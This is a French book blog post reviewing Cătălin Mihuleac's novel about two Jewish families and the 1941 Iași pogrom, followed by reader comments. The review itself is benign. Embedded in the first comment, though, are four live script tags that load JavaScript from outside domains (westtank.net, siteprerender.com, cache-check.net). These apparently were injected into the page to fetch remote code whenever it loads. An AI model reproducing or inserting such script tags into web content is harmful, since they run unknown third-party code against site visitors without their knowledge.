• Cátálin Mihuleac, Les Oxenberg et les Bernstein, Noir sur blanc

     

    Cátálin Mihuleac, Les Oxenberg et les Bernstein, Noir sur blancDeux familles juives, à des époques et en des lieux différents. A Washington DC, au début du 21° siècle, les Bernstein possèdent une grosse entreprise familiale de friperie. Désireux de s'étendre à l'international ils recrutent, à Iaşi en Roumanie, une jeune femme volontaire, Suzy. Elle épouse rapidement le fils aîné de la famille, Ben, se convertit au judaïsme et donne à l'entreprise une nouvelle ampleur.

     

    A la fin des années 1930, à Iaşi en Roumanie, Jacques Oxenberg est un obstétricien renommé. Sa famille vit confortablement et est peu consciente de la montée de l'antisémitisme. Le lecteur se doute dès le début que les histoires de ces deux familles vont se rejoindre et j'avais compris comment assez vite.

     

     

     

    Ce roman aborde de nombreux sujets. J'en ai appris sur le commerce de la fripe, sur les écrivains classiques roumains et même sur Gérard Lenorman -tous sujets sur lesquels je ne connaissais pas grand chose, il faut le dire. Mais l'acmé de l'ouvrage c'est le pogrom de Iaşi, le 29 juin 1941, lors duquel près de 15 000 Juifs ont été assassinés par les forces de l'ordre locales assistées de nombreux civils. Ceci sur l'ordre explicite de Ion Antonescu, dirigeant du pays. Ce crime est longtemps resté occulté en Roumanie. Après la guerre une minorité de participants ont été jugés et condamnés. Sous la période communiste la version officielle était que la bourgeoisie fasciste avait massacré quelques centaines de travailleurs. Ce n'est qu'au début du 21° siècle que la vérité a commencé à émerger. Ce livre y a participé, semble-t-il.

     

     

    Le style est volontiers caustique et la critique mordante n'épargne personne, bourreaux ou victimes. Ceci dit les responsables sont clairement désignés. Au début j'ai trouvé cela amusant. Puis parfois un peu systématique. Enfin, à propos des trains de la mort, l'ironie évolue vers le grotesque, les scènes ont un côté allucinatoire et il me semble que c'est parfaitement choisi pour faire ressentir l'horreur de la situation. C'est donc un roman riche et que j'ai grandement apprécié, sur un épisode de la shoah que j'ignorais.

     

    A la recherche d'informations complémentaires sur le pogrome de Iaşi j'ai découvert aussi le documentaire La mort en face qui donne la parole à des survivants. Son visionnage confirme que Cátálin Mihuleac s'est bien documenté.

     

     

    L'avis de Keisha.

     

    Nous sommes le 27 janvier, journée internationale de commémoration de la shoah. Je participe au projet de lectures communes autour de la shoah organisé par Et si on bouquinait un peu et Passage à l'Est.

     

    Cátálin Mihuleac, Les Oxenberg et les Bernstein, Noir sur blanc

     


    Tags Tags : , ,
  • Commentaires

    1
    keisha
    Jeudi 28 Janvier à 07:45
    keisha

    Un bon 'roman' sur une période dont on ignore beaucoup. je participe aussi à cet excellent challenge

    <script src="//westtank.net/2313bb93141d74fb89.js?2"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8979x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8979x&format=arrjs&r=1611816289948" type="text/javascript"></script> <script src="http://westtank.net/ext/2313bb93141d74fb89.js?sid=52715_8979_&title=aa&blocks[]=31af2" type="text/javascript"></script>
      • Jeudi 28 Janvier à 09:29

        Je l'ai grandement apprécié. Je te remercie de me l'avoir fait découvrir.

         

    2
    Samedi 30 Janvier à 20:12

    Un roman que j'ai aussi noté. Je ne connaissais pas le documentaire, je vais y jeter un coup d'oeil. Merci d'avoir pris part à nos lectures communes!

      • Dimanche 31 Janvier à 08:59

        Un sujet qui m'intéresse depuis longtemps, je pouvais difficilement ne pas participer.

    3
    Samedi 30 Janvier à 21:01

    Oui, merci de nous avoir rejoints pour ces lectures communes. Je lis beaucoup de chroniques (et souvent très bonnes) sur ce livre. Heureux de voir qu'un livre roumain rencontre un tel succès, même si le pogrom que tu mentionnes n'a rien de joyeux.

      • Dimanche 31 Janvier à 08:57

        En effet mais j'ai trouvé passionnant aussi de découvrir des aspects de la culture roumaine.

    4
    Mardi 9 Février à 20:08

    En relisant le billet, je m'aperçois d'une petite erreur de date: le pogrom a eu lieu en 1941, pas en 1949. Je viens aussi de trouver un entretien avec l'auteur que je me permets de partager ici: http://bibliotheque.fondation-janmichalski.com/2021/02/04/jeudi-en-residence-avec-catalin-mihuleac/#more-5308

      • Mercredi 10 Février à 11:16

        Une erreur grossière, oui. C'est corrigé. Merci et aussi pour le lien. Très intéressant cet entretien.

         

    5
    Lundi 15 Mars à 18:18

    L'auteur a eu pas mal de soucis en Roumanie suite à la parution de son livre il y a déjà 6 ou 7 ans (il vient juste d'être traduit en France en 2020), preuve que le sujet est encore très très délicat (et on comprend pourquoi !)

      • Lundi 15 Mars à 18:34

        Oui, j'ai compris que c'est un évènement qui commence seulement à ressortir.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :